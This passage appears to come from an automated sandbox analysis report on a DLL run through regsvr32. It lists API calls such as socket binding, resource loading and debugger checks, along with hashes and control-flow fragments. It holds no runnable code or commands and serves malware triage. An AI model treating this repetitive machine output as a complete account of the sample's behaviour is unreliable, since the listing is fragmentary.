                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocVirtual
                                                                                                          • String ID:
                                                                                                          • API String ID: 4275171209-0
                                                                                                          • Opcode ID: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction ID: f227e8c1e280d8d0b8d11f9a2f1445d4c625449e48c39147985fdcb30a9e5b67
                                                                                                          • Opcode Fuzzy Hash: 1d05fb9c1b52efa1b656e8a9f1121a2f78f34b5e3947038098bbbc68630c54fe
                                                                                                          • Instruction Fuzzy Hash: FE51E9B4A0010AEFDB04CF94C990AAEB7F1FF48345F248598E905AB345D370EE91CBA5
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 10024BD7
                                                                                                            • Part of subcall function 10020421: _malloc.LIBCMT ref: 1002043F
                                                                                                            • Part of subcall function 1002AC5C: LocalAlloc.KERNEL32(00000040,?,?,1002AFE7,00000010,?,?,00000000,?,00000004,10024D5F,10022808,100207B2,?,100229B3,00000004), ref: 1002AC66
                                                                                                            • Part of subcall function 100248E2: __EH_prolog3.LIBCMT ref: 100248E9
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocH_prolog3H_prolog3_catchLocal_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1104862767-0
                                                                                                          • Opcode ID: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction ID: a1f779584784c66b6c6d6693aa33ee417c0f7bf9ec3ebef889974536428868aa
                                                                                                          • Opcode Fuzzy Hash: fd7fb294918823335492a66fe64f990aaa4eeed4153628f3b589ca3afe8965ee
                                                                                                          • Instruction Fuzzy Hash: 87317AB4A05B40CFD761CF69904125EFBF0FF94700FA08A1EA19A87791CB71A640CB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 246 1001fb60-1001fba1 call 100236ce 248 1001fba3-1001fbaa 246->248 249 1001fbb1-1001fbb7 248->249 250 1001fbac call 1001fb50 248->250 252 1001fbc1-1001fbc4 249->252 253 1001fbb9-1001fbbf 249->253 250->249 254 1001fbc7-1001fc07 call 1002e804 252->254 253->254 257 1001fc09-1001fc19 254->257 258 1001fc1e-1001fc2c 254->258 257->258
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _memcpy_s
                                                                                                          • String ID:
                                                                                                          • API String ID: 2001391462-0
                                                                                                          • Opcode ID: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction ID: f5ed4905dd4460340b5ac9a4a0a7973f6bbe06acb99917e18be8531ceafe8f55
                                                                                                          • Opcode Fuzzy Hash: d3dc88160a5e56be7f368e8a08c7792e6ef88e5c4e6cc4fd85bb2cebbcebf868
                                                                                                          • Instruction Fuzzy Hash: EA3197B4E0060ADFCB04DF98C891AAEB7B1FF88310F148699E915AB355D730AD41CF94
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 260 1002b0bb-1002b0d3 call 10030535 263 1002b0d5 call 10023b5b 260->263 264 1002b0da-1002b0dd 260->264 263->264 266 1002b115-1002b126 call 1002ac8f 264->266 267 1002b0df-1002b0e7 264->267 276 1002b13b-1002b142 call 1003060d 266->276 277 1002b128-1002b136 call 1002af6b 266->277 268 1002b10a call 1002adac 267->268 269 1002b0e9-1002b108 call 1002aec4 267->269 275 1002b10f-1002b113 268->275 269->263 269->268 275->263 275->266 277->276
                                                                                                          APIs
                                                                                                          • __EH_prolog3.LIBCMT ref: 1002B0C2
                                                                                                            • Part of subcall function 10023B5B: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8H_prolog3Throw
                                                                                                          • String ID:
                                                                                                          • API String ID: 3670251406-0
                                                                                                          • Opcode ID: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction ID: c80a5d1f5578f8721dbd374575b215f2d5835d67e27bcfac389e5dd05e3c6f9c
                                                                                                          • Opcode Fuzzy Hash: 4f981416dc5ef7bbdfecb2dfbb495584922b02ae1a1aa31fe3482948e2cc2218
                                                                                                          • Instruction Fuzzy Hash: FE017C386006438BDB26DF64DC6172E76E2EB843A1FA2442EE9518B291EF359D41CB40
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 282 10008000-1000801a call 1002e654 285 10008023-10008037 282->285 286 1000801c-10008021 282->286 288 1000804b-10008052 285->288 287 1000807b-1000807e 286->287 289 10008054-1000805c 288->289 290 1000805e-10008062 call 1002e577 288->290 289->288 293 10008067-10008070 290->293 294 10008072-10008074 293->294 295 10008076 293->295 294->287 295->287
                                                                                                          APIs
                                                                                                          • _malloc.LIBCMT ref: 1000800B
                                                                                                            • Part of subcall function 1002E654: __FF_MSGBANNER.LIBCMT ref: 1002E677
                                                                                                            • Part of subcall function 1002E654: __NMSG_WRITE.LIBCMT ref: 1002E67E
                                                                                                            • Part of subcall function 1002E654: RtlAllocateHeap.NTDLL(00000000,-0000000F,00000001,00000000,00000000,?,100351BF,00000000,00000001,00000000,?,100357EF,00000018,1004E870,0000000C,10035880), ref: 1002E6CB
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: AllocateHeap_malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 501242067-0
                                                                                                          • Opcode ID: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction ID: 9a20b1d8cf5172607ffba420905976db52b7852b2de11c78eab645b8586f80a8
                                                                                                          • Opcode Fuzzy Hash: 9844e1e0ea7d25e2d8370f8d0841ec7162df559c8b01d3b16c313ebecebe2b95
                                                                                                          • Instruction Fuzzy Hash: BD012CB4D08158EBEB00CFA4D85569EBBB4FB00394F108895D9516B305D376AB18DB91
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 296 100236ce-100236dc 297 100236e2-100236ed call 1002e654 296->297 298 100236de-100236e0 296->298 301 100236f2-100236f5 297->301 299 10023707-1002370a 298->299 301->298 302 100236f7-10023704 301->302 302->299
                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: _malloc
                                                                                                          • String ID:
                                                                                                          • API String ID: 1579825452-0
                                                                                                          • Opcode ID: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction ID: 890261fd43258a4c098dfe067f91bb2ba3d5f49a8a728e9457d7994589d2c75f
                                                                                                          • Opcode Fuzzy Hash: f1b84940060e793f2024458e4c8e5a4687c3363722e5127f1986a87a664482b3
                                                                                                          • Instruction Fuzzy Hash: 4CE06D766006156BC700CB4AE408A46BBDCDFA13B0F56C466E808CB252CAB1E8048BA0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 303 1002acfb-1002ad0d call 10030568 306 1002ad30-1002ad37 call 1003060d 303->306 307 1002ad0f-1002ad1e call 1002a6ab 303->307 312 1002ad20 call 10024d0b 307->312 313 1002ad25-1002ad2b call 1002a71d 307->313 315 1002ad23 312->315 313->306 315->313
                                                                                                          APIs
                                                                                                          • __EH_prolog3_catch.LIBCMT ref: 1002AD02
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6E5
                                                                                                            • Part of subcall function 1002A6AB: InitializeCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A6F7
                                                                                                            • Part of subcall function 1002A6AB: LeaveCriticalSection.KERNEL32(10086308,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A704
                                                                                                            • Part of subcall function 1002A6AB: EnterCriticalSection.KERNEL32(?,?,?,?,?,1002AD16,00000010,00000008,10024D7E,10024D21,10022808,100207B2,?,100229B3,00000004,100217C4), ref: 1002A714
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CriticalSection$Enter$H_prolog3_catchInitializeLeave
                                                                                                          • String ID:
                                                                                                          • API String ID: 1641187343-0
                                                                                                          • Opcode ID: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction ID: 3b67d6bb43f4ea54dfbebb57807521158ddd2742ca645746548a7aae3598e2fb
                                                                                                          • Opcode Fuzzy Hash: 66fe0e46e7327439d87287bd7a4e421fc252772a67af4eb91e5b37aeeae1f300
                                                                                                          • Instruction Fuzzy Hash: F3E04F386442069BE760DFA4D846B4DB6E0EF01762FA04628F9D1EB2C2DF70AD80DB15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Control-flow Graph

                                                                                                          • Executed
                                                                                                          • Not Executed
                                                                                                          control_flow_graph 317 10035645-10035667 HeapCreate 318 1003566b-10035674 317->318 319 10035669-1003566a 317->319
                                                                                                          APIs
                                                                                                          • HeapCreate.KERNELBASE(00000000,00001000,00000000,?,1002E896,00000001,?,?,?,1002EA0F,?,?,?,1004E6A8,0000000C,1002EACA), ref: 1003565A
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: CreateHeap
                                                                                                          • String ID:
                                                                                                          • API String ID: 10892065-0
                                                                                                          • Opcode ID: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction ID: 0df5893edc33e170cd9319f6da52f4968d67da800731ff8b92bc7feba6a3d305
                                                                                                          • Opcode Fuzzy Hash: 11ed1c273bd328d3672869b0a3b6640a53f1cfb0cc5beffffd0de0ee24041fc5
                                                                                                          • Instruction Fuzzy Hash: 17D05E329507559EF7029F716C49B223BDCE384A96F048436F80CC61A0E670C6418A04
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Non-executed Functions

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ___getlocaleinfo
                                                                                                          • String ID:
                                                                                                          • API String ID: 1937885557-0
                                                                                                          • Opcode ID: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction ID: b04c4d7f6a57d8df90e79b3f21b47685716bac7d418787b81275d3872e324d7c
                                                                                                          • Opcode Fuzzy Hash: 140fc5ec8b9a87e1cb2285073580b9a6ca86accc3e2e9ca1bcb8d5ec2949de64
                                                                                                          • Instruction Fuzzy Hash: 0DE1DDB294060DBEEF12CAE1CC85DFFB7BDFB04744F14096AB255E6041EA71AB059B60
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • WSAStartup.WS2_32(?,?), ref: 10001194
                                                                                                          • _memset.LIBCMT ref: 100011A8
                                                                                                          • htonl.WS2_32(00000000), ref: 100011C1
                                                                                                          • htons.WS2_32(?), ref: 100011D5
                                                                                                          • socket.WS2_32(00000002,00000002,00000000), ref: 100011EB
                                                                                                          • bind.WS2_32(?,?,00000010), ref: 10001210
                                                                                                          • setsockopt.WS2_32(?,0000FFFF,00001006,00000001,00000008), ref: 10001252
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Startup_memsetbindhtonlhtonssetsockoptsocket
                                                                                                          • String ID:
                                                                                                          • API String ID: 1003240404-0
                                                                                                          • Opcode ID: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction ID: 8b71fe392eebb4791ef10e00b80357e65c28fbed0d3ec8f38f9f26760835bea4
                                                                                                          • Opcode Fuzzy Hash: 4267394abd7b2fe00b1ee463b318e0afc4881c9e2497cd05d0da4904e14a920c
                                                                                                          • Instruction Fuzzy Hash: D6317C74A01228AFE760CB54CC85BE9B7B4FF8A714F0041D8E949AB281CB71AD80DF55
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • _strcpy_s.LIBCMT ref: 100212CD
                                                                                                            • Part of subcall function 100210FF: __CxxThrowException@8.LIBCMT ref: 10023B71
                                                                                                            • Part of subcall function 100210FF: __cftof.LIBCMT ref: 10023B88
                                                                                                            • Part of subcall function 10030D24: __getptd_noexit.LIBCMT ref: 10030D24
                                                                                                          • GetLocaleInfoA.KERNEL32(00000800,00000003,?,00000004), ref: 100212E5
                                                                                                          • __snwprintf_s.LIBCMT ref: 1002131A
                                                                                                          • LoadLibraryA.KERNEL32(?), ref: 10021355
                                                                                                          Strings
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Exception@8InfoLibraryLoadLocaleThrow__cftof__getptd_noexit__snwprintf_s_strcpy_s
                                                                                                          • String ID: LOC
                                                                                                          • API String ID: 1016519223-519433814
                                                                                                          • Opcode ID: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction ID: e5882df6752d869781cd97db702e75e799ef83d3d4dcb43d327d0f518dc3dfd8
                                                                                                          • Opcode Fuzzy Hash: 8ad2e179110c5fc4a63ba0c3a506fe82720806b71859df2b9a9481073aac2a1f
                                                                                                          • Instruction Fuzzy Hash: A021063990121CAFDB11EBA0EC46BDD33EEEB05751F9004A1FA04DB491DB70AE45C6A0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • IsDebuggerPresent.KERNEL32 ref: 10031D3A
                                                                                                          • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 10031D4F
                                                                                                          • UnhandledExceptionFilter.KERNEL32(10049478), ref: 10031D5A
                                                                                                          • GetCurrentProcess.KERNEL32(C0000409), ref: 10031D76
                                                                                                          • TerminateProcess.KERNEL32(00000000), ref: 10031D7D
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                                          • String ID:
                                                                                                          • API String ID: 2579439406-0
                                                                                                          • Opcode ID: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction ID: eb2889493d924e234dee94db6a5018ee6042f58a5b7914c10149dcbc3be7d463
                                                                                                          • Opcode Fuzzy Hash: 71874975056eb2054f9aced908419e2b906654dc85cf8b7fbf46a45a6eae212a
                                                                                                          • Instruction Fuzzy Hash: C8219AB8C01A24DFF742DF68DDC96883BB4FB1C345F52102AE9088B665E7B06985CF15
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: State$LongMessageSendWindow
                                                                                                          • String ID:
                                                                                                          • API String ID: 1063413437-0
                                                                                                          • Opcode ID: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction ID: a80f2be592eaa4d0f51a0e10a6f75c43a55355dd3138243e3a8160c71d5bf3bd
                                                                                                          • Opcode Fuzzy Hash: a9509507a0c3cd732412f6ac1bfcc6ca4a4eab2c6e7fc2ddd7a5ec5eb68b4cea
                                                                                                          • Instruction Fuzzy Hash: 0AF0E93A7C035B66EA10E6707C81F950814FF45BD4FC11431BF49EA1D2DFA0C89119B0
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          APIs
                                                                                                          • LoadResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002118E
                                                                                                          • LockResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 1002119C
                                                                                                          • SizeofResource.KERNEL32(00000000,?,?,1002120D,00000000,00000000,?,?,1002189A,00000000,?,?,?,?,10021950,00000000), ref: 100211AE
                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
                                                                                                          • Associated: 00000002.00000002.670081674.0000000010000000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670121747.0000000010047000.00000002.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670130141.0000000010051000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670135461.0000000010054000.00000008.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670159582.0000000010084000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670165094.0000000010086000.00000004.00020000.sdmp Download File
                                                                                                          • Associated: 00000002.00000002.670171210.0000000010089000.00000002.00020000.sdmp Download File
                                                                                                          Joe Sandbox IDA Plugin
                                                                                                          • Snapshot File: hcaresult_2_2_10000000_regsvr32.jbxd
                                                                                                          Similarity
                                                                                                          • API ID: Resource$LoadLockSizeof
                                                                                                          • String ID:
                                                                                                          • API String ID: 2853612939-0
                                                                                                          • Opcode ID: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
                                                                                                          • Instruction ID: 5885e8a255633e1cc81cd5e62f2e9d9df206611330dfebe0406f5a0ab521e5b9
                                                                                                          • Opcode Fuzzy Hash: 8b420e262c7312fbbd320bda05a88a884026fa2b8a5d750ea2b9a6c299d0f1d4
                                                                                                          • Instruction Fuzzy Hash: 7FF0F03A60013BA7CF219F69FC044E97BD5FF107E67414425FEA9C2060E231D870D680
                                                                                                          Uniqueness

                                                                                                          Uniqueness Score: -1.00%

                                                                                                          Memory Dump Source
                                                                                                          • Source File: 00000002.00000002.670087441.0000000010001000.00000020.00020000.sdmp, Offset: 10000000, based on PE: true
